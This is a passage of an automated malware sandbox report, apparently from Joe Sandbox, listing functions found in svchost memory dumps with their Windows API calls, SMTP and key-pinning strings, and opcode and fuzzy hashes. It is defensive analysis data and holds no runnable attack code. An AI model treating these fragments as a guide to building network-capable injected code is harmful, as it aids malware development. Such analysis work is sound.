                                                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173CFC0F731
                                                                  • Part of subcall function 00000173CFC04E20: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00000173CFC05D4B), ref: 00000173CFC04E37
                                                                  • Part of subcall function 00000173CFC04E20: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00000173CFC05D4B), ref: 00000173CFC04E4B
                                                                  • Part of subcall function 00000173CFC04E20: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00000173CFC05D4B), ref: 00000173CFC04E5F
                                                                  • Part of subcall function 00000173CFC04E20: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00000173CFC05D4B), ref: 00000173CFC04E73
                                                                  • Part of subcall function 00000173CFC04E20: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00000173CFC05D4B), ref: 00000173CFC04E87
                                                                  • Part of subcall function 00000173CFC04E20: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00000173CFC05D4B), ref: 00000173CFC04E9B
                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 00000173CFC0F792
                                                                  • Part of subcall function 00000173CFC39D20: _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,00000173CFC51B71,?,?,00000000,00000173CFC05CE8), ref: 00000173CFC39D3A
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2555978653.00000173CFC01000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173CFC00000, based on PE: true
                                                                • Associated: 00000010.00000002.2555926187.00000173CFC00000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2556090829.00000173CFC55000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2556158270.00000173CFC86000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2556223268.00000173CFC8A000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2556223268.00000173CFC8F000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173cfc00000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free$Concurrency::cancel_current_taskExceptionThrowmalloc
                                                                • String ID:
                                                                • API String ID: 2506944222-0
                                                                • Opcode ID: 8c1d8eb806682c77dd72749f47572942c8448acf976269ac0f3bfc27fc70cc4c
                                                                • Instruction ID: e82d786c15c00f9d881247b9e779559b10206456a172a622e0bf05056d169f5f
                                                                • Opcode Fuzzy Hash: 8c1d8eb806682c77dd72749f47572942c8448acf976269ac0f3bfc27fc70cc4c
                                                                • Instruction Fuzzy Hash: 0B219237309B4692EA22DB15E5907D96370FB84B80F44CD23CAED53B65DF28C656E301
                                                                Function 00000173D01743B0 Relevance: 3.0, APIs: 2, Instructions: 41networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: closesocketsocket
                                                                • String ID:
                                                                • API String ID: 2760038618-0
                                                                • Opcode ID: 27b388f8f4bc6737c7fb520ec9b203deaa45030ab93c0741097e461f5fa6597e
                                                                • Instruction ID: a4445b3bba25b0319ba5e55d2dd114ffcceaad2adc473ed5aa85760d5e04c904
                                                                • Opcode Fuzzy Hash: 27b388f8f4bc6737c7fb520ec9b203deaa45030ab93c0741097e461f5fa6597e
                                                                • Instruction Fuzzy Hash: E301D1267056C0C7FB6547E6E0C53E91760AB95FB0F4C82748A3E167E1DB6849D5A300
                                                                Function 00000173D0168EA0 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ExclusiveLock$AcquireRelease
                                                                • String ID:
                                                                • API String ID: 17069307-0
                                                                • Opcode ID: 39a519f4624760cd79ac458549f5595ef9daf227755beea38229d5db3c9119c4
                                                                • Instruction ID: 00fdf4b1800da78a98fea4205ddbf76c1940dba4cdf94c9264fb7a08892eb316
                                                                • Opcode Fuzzy Hash: 39a519f4624760cd79ac458549f5595ef9daf227755beea38229d5db3c9119c4
                                                                • Instruction Fuzzy Hash: 82D0173871864482EB256BE0E8D43E86274A759B54FC41024C83E46351FBA88A8CE310
                                                                Function 00000173D03B3D58 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2560283707.00000173D03B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000173D03B0000, based on PE: true
                                                                • Associated: 00000010.00000002.2559994947.00000173D03B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2560836688.00000173D03C6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2561560882.00000173D03D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2561932402.00000173D03D3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2562469981.00000173D03D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d03b0000_svchost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $LMX
                                                                • API String ID: 0-1475574623
                                                                • Opcode ID: b4da42a706a87f17c2f2cfefd8112183663bfed5671a2c80788db3ec5171a75c
                                                                • Instruction ID: 23979416cc364d5db9e864ebd8044e3b2ef856530086ef227bd990b2b5b63ad1
                                                                • Opcode Fuzzy Hash: b4da42a706a87f17c2f2cfefd8112183663bfed5671a2c80788db3ec5171a75c
                                                                • Instruction Fuzzy Hash: D3D05E30716645C6EB79DFE5CAC46E0A3709B04F88FC88029992941110D79A9A9DE610
                                                                Function 00000173D01898C0 Relevance: 2.6, APIs: 2, Instructions: 84COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: 72d2dbb8c05805521502d31913c7e2dcfda900fa91af8ab57f2baabed37d7821
                                                                • Instruction ID: 25752253c70731ffcba9fb4cc49b3624c368427b958c1748a6ce3dab28b7a23b
                                                                • Opcode Fuzzy Hash: 72d2dbb8c05805521502d31913c7e2dcfda900fa91af8ab57f2baabed37d7821
                                                                • Instruction Fuzzy Hash: E831E43630C64095EA68ABA6D5C03EDA6B0F749FC4F880025EF6E07785FF69C651A350
                                                                Function 00000173D0382C98 Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000003.1588552176.00000173D0380000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000173D0380000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_3_173d0380000_svchost.jbxd
                                                                Similarity
                                                                • API ID: LibraryLoad
                                                                • String ID:
                                                                • API String ID: 1029625771-0
                                                                • Opcode ID: c8def6fedd9c5836e92fabc2dd1894f4ed18aaca8c094442d268cbce729e04a9
                                                                • Instruction ID: ba700a2fca9e2e4f90a47902013e61597943d77929cb7caf7ffffa12b04031df
                                                                • Opcode Fuzzy Hash: c8def6fedd9c5836e92fabc2dd1894f4ed18aaca8c094442d268cbce729e04a9
                                                                • Instruction Fuzzy Hash: 97911072B0525187EB648FA5D280BADB3B1FB40FD4F8481609F6E07784DB79EA52E700
                                                                Function 00000173D03B1BC0 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00000173D03B1724: GetProcessHeap.KERNEL32 ref: 00000173D03B172F
                                                                  • Part of subcall function 00000173D03B1724: HeapAlloc.KERNEL32 ref: 00000173D03B173E
                                                                  • Part of subcall function 00000173D03B1724: RegOpenKeyExW.ADVAPI32 ref: 00000173D03B17AE
                                                                  • Part of subcall function 00000173D03B1724: RegOpenKeyExW.ADVAPI32 ref: 00000173D03B17DB
                                                                  • Part of subcall function 00000173D03B1724: RegCloseKey.ADVAPI32 ref: 00000173D03B17F5
                                                                  • Part of subcall function 00000173D03B1724: RegOpenKeyExW.ADVAPI32 ref: 00000173D03B1815
                                                                  • Part of subcall function 00000173D03B1724: RegCloseKey.ADVAPI32 ref: 00000173D03B1830
                                                                  • Part of subcall function 00000173D03B1724: RegOpenKeyExW.ADVAPI32 ref: 00000173D03B1850
                                                                  • Part of subcall function 00000173D03B1724: RegCloseKey.ADVAPI32 ref: 00000173D03B186B
                                                                  • Part of subcall function 00000173D03B1724: RegOpenKeyExW.ADVAPI32 ref: 00000173D03B188B
                                                                  • Part of subcall function 00000173D03B1724: RegCloseKey.ADVAPI32 ref: 00000173D03B18A6
                                                                  • Part of subcall function 00000173D03B1724: RegOpenKeyExW.ADVAPI32 ref: 00000173D03B18C6
                                                                • SleepEx.KERNELBASE ref: 00000173D03B1BDB
                                                                  • Part of subcall function 00000173D03B1724: RegCloseKey.ADVAPI32 ref: 00000173D03B18E1
                                                                  • Part of subcall function 00000173D03B1724: RegOpenKeyExW.ADVAPI32 ref: 00000173D03B1901
                                                                  • Part of subcall function 00000173D03B1724: RegCloseKey.ADVAPI32 ref: 00000173D03B191C
                                                                  • Part of subcall function 00000173D03B1724: RegOpenKeyExW.ADVAPI32 ref: 00000173D03B193C
                                                                  • Part of subcall function 00000173D03B1724: RegCloseKey.ADVAPI32 ref: 00000173D03B1957
                                                                  • Part of subcall function 00000173D03B1724: RegOpenKeyExW.ADVAPI32 ref: 00000173D03B1977
                                                                  • Part of subcall function 00000173D03B1724: RegCloseKey.ADVAPI32 ref: 00000173D03B1992
                                                                  • Part of subcall function 00000173D03B1724: RegCloseKey.ADVAPI32 ref: 00000173D03B199C
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2560283707.00000173D03B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000173D03B0000, based on PE: true
                                                                • Associated: 00000010.00000002.2559994947.00000173D03B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2560836688.00000173D03C6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2561560882.00000173D03D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2561932402.00000173D03D3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2562469981.00000173D03D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d03b0000_svchost.jbxd
                                                                Similarity
                                                                • API ID: CloseOpen$Heap$AllocProcessSleep
                                                                • String ID:
                                                                • API String ID: 948135145-0
                                                                • Opcode ID: c734f778ebace249d11891a89cc237880a62daafbc4a5d84d80dcf23aa596c60
                                                                • Instruction ID: 50c5c79aded8a30942cffc8ac8b74a1e4900b60efe01ecfe701284cbe0691cc6
                                                                • Opcode Fuzzy Hash: c734f778ebace249d11891a89cc237880a62daafbc4a5d84d80dcf23aa596c60
                                                                • Instruction Fuzzy Hash: E431717130860441FB739FA2D7403EDD3B0AB84FC8FD454218E2D8769ADFA2CA50A350
                                                                Function 00000173D0158230 Relevance: 1.5, APIs: 1, Instructions: 46networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: socket
                                                                • String ID:
                                                                • API String ID: 98920635-0
                                                                • Opcode ID: 4b996f48484ad4d943085cdf321c2f5f56c4e47a803c815960622bae58fff54d
                                                                • Instruction ID: 85ac370fe7c2642e42f65863f53e112ce28b7edd5ffc546a91c360c329e0cb29
                                                                • Opcode Fuzzy Hash: 4b996f48484ad4d943085cdf321c2f5f56c4e47a803c815960622bae58fff54d
                                                                • Instruction Fuzzy Hash: 80118236708A80C2D7648FA6E184399B7B1F748FE4F888620DBAD57B94DF38D591D700
                                                                Function 00000173D0158110 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: closesocket
                                                                • String ID:
                                                                • API String ID: 2781271927-0
                                                                • Opcode ID: f5e5c931f568ed04444b0b36d0a8910c15cb7555877ea71fb8bd6f2f63156bad
                                                                • Instruction ID: ac9e1fe8e9a7d0147c3bdf9fe5a847a79d73fdba19f5f9fbb7c86d4e4c2e860f
                                                                • Opcode Fuzzy Hash: f5e5c931f568ed04444b0b36d0a8910c15cb7555877ea71fb8bd6f2f63156bad
                                                                • Instruction Fuzzy Hash: FB01963571865041EA649796E48839A9270F748FE4F8C5320AE3E5BBD9EF28C5915700
                                                                Function 00000173CFC2E310 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00000173CFC2E319
                                                                  • Part of subcall function 00000173CFC03080: GetLocaleInfoEx.KERNELBASE ref: 00000173CFC030A3
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2555978653.00000173CFC01000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173CFC00000, based on PE: true
                                                                • Associated: 00000010.00000002.2555926187.00000173CFC00000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2556090829.00000173CFC55000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2556158270.00000173CFC86000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2556223268.00000173CFC8A000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2556223268.00000173CFC8F000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173cfc00000_svchost.jbxd
                                                                Similarity
                                                                • API ID: InfoLocale___lc_locale_name_func
                                                                • String ID:
                                                                • API String ID: 3366915261-0
                                                                • Opcode ID: f321fbd6428a595b6038f718f98f2583b86d447d5f6d195c715a18383540869d
                                                                • Instruction ID: 99140b91e00974be83252a423111522e3f1ce97f17df162e65bef14edb4307fe
                                                                • Opcode Fuzzy Hash: f321fbd6428a595b6038f718f98f2583b86d447d5f6d195c715a18383540869d
                                                                • Instruction Fuzzy Hash: 1AF08C3372D042C2E36A5A28C0947F912B0F384702F458907E1DE722A0C618D744E601
                                                                Function 00000173D01648E0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: _beginthreadex
                                                                • String ID:
                                                                • API String ID: 3014514943-0
                                                                • Opcode ID: 12d530c60010292d5cdc75557250193eb43d1c307b29f796c6545e99bf5471df
                                                                • Instruction ID: 13591cc2fc31543e8262d2419cf3aeb6f509bcf6ee9655bb366dee95d8c6d63c
                                                                • Opcode Fuzzy Hash: 12d530c60010292d5cdc75557250193eb43d1c307b29f796c6545e99bf5471df
                                                                • Instruction Fuzzy Hash: D3E0C266B1974083EF345FB2AC41256E3916B4CBB1F8C473C5D7C467E0E73C92918810
                                                                Function 00000173D03BD26C Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • HeapAlloc.KERNEL32(?,?,00000000,00000173D03BCBA2,?,?,?,00000173D03BD255,?,?,?,?,00000173D03BD318), ref: 00000173D03BD2C1
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2560283707.00000173D03B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000173D03B0000, based on PE: true
                                                                • Associated: 00000010.00000002.2559994947.00000173D03B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2560836688.00000173D03C6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2561560882.00000173D03D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2561932402.00000173D03D3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2562469981.00000173D03D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d03b0000_svchost.jbxd
                                                                Similarity
                                                                • API ID: AllocHeap
                                                                • String ID:
                                                                • API String ID: 4292702814-0
                                                                • Opcode ID: 74fd91d67496214158fd315a04cded00c411d46558866947622f89becc2b6a32
                                                                • Instruction ID: b905cbf759bbb08869538362d06dad7acf8dab3dcc31abde94d38fbdd58cea87
                                                                • Opcode Fuzzy Hash: 74fd91d67496214158fd315a04cded00c411d46558866947622f89becc2b6a32
                                                                • Instruction Fuzzy Hash: 32F04934B0928041FF7656E2DA543D5D2B05B89FC8F8C18341D2E8A7C6FBBECA916210
                                                                Function 00000173D018FEC0 Relevance: 1.3, APIs: 1, Instructions: 20COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: memset
                                                                • String ID:
                                                                • API String ID: 2221118986-0
                                                                • Opcode ID: 61ce7c71b359922bf70661d37482ef1cbf245bc6e1db0f0ea117e0447321ee61
                                                                • Instruction ID: 6388e022b5f097a46485c13e1e5096cbd60c2f19dafa93ed9f2c739126364ee3
                                                                • Opcode Fuzzy Hash: 61ce7c71b359922bf70661d37482ef1cbf245bc6e1db0f0ea117e0447321ee61
                                                                • Instruction Fuzzy Hash: 06D02BA272498001DB3855F7F6836DAD052975AFC0F88D034AE198BB8AEA2CC2810700

                                                                Non-executed Functions

                                                                Function 00000173D019A3A0 Relevance: 58.1, APIs: 22, Strings: 11, Instructions: 346stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free$_strdup$strpbrk$calloc
                                                                • String ID: AUTH=$ SIZE=$ SMTPUTF8$%lld$<%s>$<%s@%s>$MAIL$MAIL FROM:%s%s%s%s%s%s$Mime-Version$Mime-Version: 1.0$state change from %s to %s
                                                                • API String ID: 2687331901-2592802878
                                                                • Opcode ID: 77683b034023e0f09403e8cfb9fedcec5a80b7e659e4f3fa74468bc290c19b37
                                                                • Instruction ID: 5150c4299bba8bba66cdbf27cf11e9d68df7a2451df87fa0d18afc9d80648518
                                                                • Opcode Fuzzy Hash: 77683b034023e0f09403e8cfb9fedcec5a80b7e659e4f3fa74468bc290c19b37
                                                                • Instruction Fuzzy Hash: 14E16AB9209A4181FB759BA5E4513E9A3B0AB45FD4FC805119DBE07791FF38CB4AE380
                                                                Function 00000173D01B4560 Relevance: 56.3, APIs: 25, Strings: 7, Instructions: 251stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free$_strdup_vfwprintf_lmallocstrncmp
                                                                • String ID: -----END PUBLIC KEY-----$ public key hash: sha256//%s$-----BEGIN PUBLIC KEY-----$;sha256//$Z$Z$sha256//
                                                                • API String ID: 141866899-1456817947
                                                                • Opcode ID: 0e6319b7de69a80c1b548ad74560fad343a29925f386b4f68f10fe632278962a
                                                                • Instruction ID: 6885843332948220a6d969eebe71c3a703108cd6f11444f1e769de40d9f0dbff
                                                                • Opcode Fuzzy Hash: 0e6319b7de69a80c1b548ad74560fad343a29925f386b4f68f10fe632278962a
                                                                • Instruction Fuzzy Hash: 9DA19039209B6042FA769BD6E8503EAA7B0A74AFC4FC84025DD6D47795FF38C645E700
                                                                Function 00000173D01A74F0 Relevance: 42.3, APIs: 16, Strings: 8, Instructions: 269COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000003,?), ref: 00000173D01A754D
                                                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000003,?), ref: 00000173D01A7562
                                                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000003,?), ref: 00000173D01A7582
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000003,?), ref: 00000173D01A75B0
                                                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000003,?), ref: 00000173D01A75D3
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000003,?), ref: 00000173D01A7656
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000003,?), ref: 00000173D01A7661
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000003,?), ref: 00000173D01A766C
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000003,?), ref: 00000173D01A7742
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D01A776F
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000003,?), ref: 00000173D01A7795
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000003,?), ref: 00000173D01A7810
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000003,?), ref: 00000173D01A783B
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D01A78E4
                                                                  • Part of subcall function 00000173D0171BF0: realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D0171C18
                                                                  • Part of subcall function 00000173D0171BF0: GetEnvironmentVariableA.KERNEL32 ref: 00000173D0171C3E
                                                                  • Part of subcall function 00000173D0171BF0: realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D0171C5F
                                                                  • Part of subcall function 00000173D0171BF0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D0171C70
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D01A7923
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D01A792C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
